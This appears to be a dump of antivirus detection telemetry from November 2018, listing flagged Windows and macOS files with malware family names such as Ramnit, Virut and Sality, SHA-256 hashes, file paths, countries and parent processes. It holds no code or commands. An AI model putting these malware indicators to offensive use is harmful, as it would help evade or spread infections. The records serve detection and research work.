  Row(detection=Row(filename='бланк письма 2014 пособие доп..exe', filepath='F:\\Проф\\Бланк письма 2014 пособие доп..exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='b1567728f7c9c301faf0e69894160bc87eea4da220c5850aa5f9d4863d75c3cf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Distrib\\Total Commander\\Totalcmd.exe', parentsize=826916, timestamp='2018-11-04T12:44:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='H:\\Archivos de programa\\Windows Media Player\\wmplayer.exe', filesize=64000, name='W32/Ramnit.C.#M1.#R1'), hash='b158210d274c8f6ef5335df2970dbfd21fce76c1e7dc2787225bfd1ca922e9d4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T02:47:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b1669dd8ab9595df192af2e61a14416ab08b67250febbfc35cf35a356c2a49e2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B1669DD8AB9595DF192AF2E61A14416AB08B67250FEBBFC35CF35A356C2A49E2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b1669dd8ab9595df192af2e61a14416ab08b67250febbfc35cf35a356c2a49e2', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:41:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='b17bc58acf9c9ea26bc7938f90cfe6a29f9e819e065a748e52fcf789239a2c01', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:25:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214028-b9b3fc46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ea6c146\\AVSCAN-20181104-210551-802B9C0A\\AVSCAN-20181104-214028-B9B3FC46', filesize=6576000, name='TR/Crypt.ZPACK.Gen4.#M1.#R1'), hash='b17d7248409cd6d644fea097f39d3f9946d799d9a7cb51af45c1583fee67f1d1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T14:41:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updse2.html', filepath='G:\\WD SmartWare\\locale\\en_US.lproj\\UPDSE2.html', filesize=136000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b1e2f8c28dc7ba491be8ddd223f95a46ec4079465e20213cc3eeac7f10c2034f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T00:15:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered rinit', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered rinit', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='b291d04a513b0ba38ef40083d66fc8ef5ca7e686c9d27100ec812d5f5223cb24', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T01:31:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214842-21863871', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-214842-21863871', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:48:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blankandsecure.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\BlankAndSecure.exe', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='enbhost.exe', filepath='I:\\E\\Program Files\\SK\\Skyrim\\DWENB-零版[Zero]\\enbhost.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='b2b4767f133262bc54121296b5ff7a1437e7af1e142b041f8aa7fb44d7902ade', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\软件\\fastcopy_ha\\FastCopy.exe', parentsize=412672, timestamp='2018-11-04T18:44:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220740-a2941f7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b99be261\\AVSCAN-20181104-220659-9C613E7F\\AVSCAN-20181104-220740-A2941F7F', filesize=15232000, name='HEUR/AGEN.1008572.#M1.#R1'), hash='b2c3f852e43ff4ddc1cf2eb945f06c846acb6fcf0adb9b44f8125635c7397dc3', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:07:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rise of the tomb raider - installshield wizard.exe', filepath='C:\\Users\\X\\Downloads\\Rise of the Tomb Raider - InstallShield Wizard.exe', filesize=15232000, name='HEUR/AGEN.1008572.#M1.#R1'), hash='b2c3f852e43ff4ddc1cf2eb945f06c846acb6fcf0adb9b44f8125635c7397dc3', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:29:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='computerdefaults.exe', filepath='\\\\?\\C:\\Windows\\System32\\ComputerDefaults.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='b300876e63f8503f36c89f0f9ffafc9b787a9cb8726ade185a054d9656a0d0d6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:37:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='whskin_tbars.htm', filepath='D:\\New Games\\العاب عربيات\\GTA 4\\most wanted\\Support\\European Help Files\\Fi\\whskin_tbars.htm', filesize=360000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b3390d8829479f2a43ad663ddabc6c174de7d624ae14019e8ec67c528e729788', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-04T21:46:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b33bb3ac041c00d733a4b3cfe4358961e05a0060de27643c4c016f7d473d0541', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B33BB3AC041C00D733A4B3CFE4358961E05A0060DE27643C4C016F7D473D0541', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b33bb3ac041c00d733a4b3cfe4358961e05a0060de27643c4c016f7d473d0541', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:19:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='b360aea851f18d28885d57acd93f352bf18856469f3426cb0676b77ee9d909a2', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T09:30:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\VC\\vcredist_x86.exe', filesize=384000, name='W32/Stanit.#M1.#R1'), hash='b3aa91b8a34ce2c8173512d0d09d7c4429849008c80b7ffbdbcda38ecbaf4cf9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:28:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b3be752d9d1ff652c4b9676ba3a22f004649e5c0855e4801ff3ee5ab0b773063', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B3BE752D9D1FF652C4B9676BA3A22F004649E5C0855E4801FF3EE5AB0B773063', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b3be752d9d1ff652c4b9676ba3a22f004649e5c0855e4801ff3ee5ab0b773063', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:22:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00426710', filepath='C:\\Windows\\Temp\\tmp00002e64\\tmp00426710', filesize=704000, name='HEUR/AGEN.1031189.#M1.#R1'), hash='b3f74a9070d8463e4ae9690c36e2bd34ec2383bf5d56c9e1341bbf861d5628d5', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T14:31:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173408-8dc8299e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3dc913be\\AVSCAN-20181104-173218-7E91D6AB\\AVSCAN-20181104-173408-8DC8299E', filesize=704000, name='DR/Delphi.udure.#M1.#R1'), hash='b3f74a9070d8463e4ae9690c36e2bd34ec2383bf5d56c9e1341bbf861d5628d5', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:34:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\setup.exe', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='b4b2347e4416075fa0dd4ce8155ff2e67bc3a061b9ec6904da41423cc07d5b7b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:34:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\setup.exe', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='b4b2347e4416075fa0dd4ce8155ff2e67bc3a061b9ec6904da41423cc07d5b7b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:34:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124412-8aa3c640', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_408c1ab0\\AVSCAN-20181104-124242-80B55C3D\\AVSCAN-20181104-124412-8AA3C640', filesize=2048000, name='HEUR/APC.#M1.#R1'), hash='b500de581700356962520b312158252db75db6d474ca8fd27f413334d366ed1a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:44:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zbeub finder.exe', filepath='c:\\users\\X\\desktop\\zbeub finder.exe', filesize=2048000, name='HEUR/APC.#M1.#R1'), hash='b500de581700356962520b312158252db75db6d474ca8fd27f413334d366ed1a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T11:42:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rkbatchtool.exe', filepath='E:\\Box Files\\SPDMTK_FILES\\Torque\\DROIDZ DUO Slim\\Rockchip_Batch_Tool_v1.7\\Rockchip_Batch_Tool_v1.7\\RKBatchTool.exe', filesize=1024000, name='W32/Sality.AG.#M1.#R1'), hash='b51869f1de40bbb17a0f5f60dda65df7887ea8772d17f3e7a3a6bf06f15d922d', metadata=Row(cmdline='\\\\\\/onboot', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WWW.HOSTJSC.NET\\Internet Download Manager\\IDMan.exe', parentsize=990720, timestamp='2018-11-04T05:56:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rkbatchtool.exe', filepath='E:\\Box Files\\SPDMTK_FILES\\Torque\\DROIDZ DUO Slim\\Rockchip_Batch_Tool_v1.7\\Rockchip_Batch_Tool_v1.7\\RKBatchTool.exe', filesize=1024000, name='W32/Sality.AG.#M1.#R1'), hash='b51869f1de40bbb17a0f5f60dda65df7887ea8772d17f3e7a3a6bf06f15d922d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-04T05:56:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='86deb4fcf9dc77efc96cbbde9fc1318ab18dd18a', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\86deb4fcf9dc77efc96cbbde9fc1318ab18dd18a', filesize=3840000, name='W32/Virut.Gen.#M1.#R1'), hash='b5fe16e15219c2d0e8d97344601bf19156efbfc66e3ff9b0cc9445c3ef76a71b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:56:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b679adc73537cac493714a2bc863442581f7031eb7819e044825f7bc60dea86f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B679ADC73537CAC493714A2BC863442581F7031EB7819E044825F7BC60DEA86F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b679adc73537cac493714a2bc863442581f7031eb7819e044825f7bc60dea86f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:38:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:04:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:16:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:01:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:01:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-27-014531/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:11:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T18:02:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T18:02:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-11-04-180050/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:56:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='GB', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:41:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:52:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-30-004642/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:56:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:44:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:44:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-11-04-170650/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:41:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:15:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-31-004459/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:12:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-29-004520/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:38:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:26:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-11-01-004627/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:26:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:33:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:33:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:45:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:45:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:45:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:04:48Z'), dt=datetime.date(2018, 11, 4)),
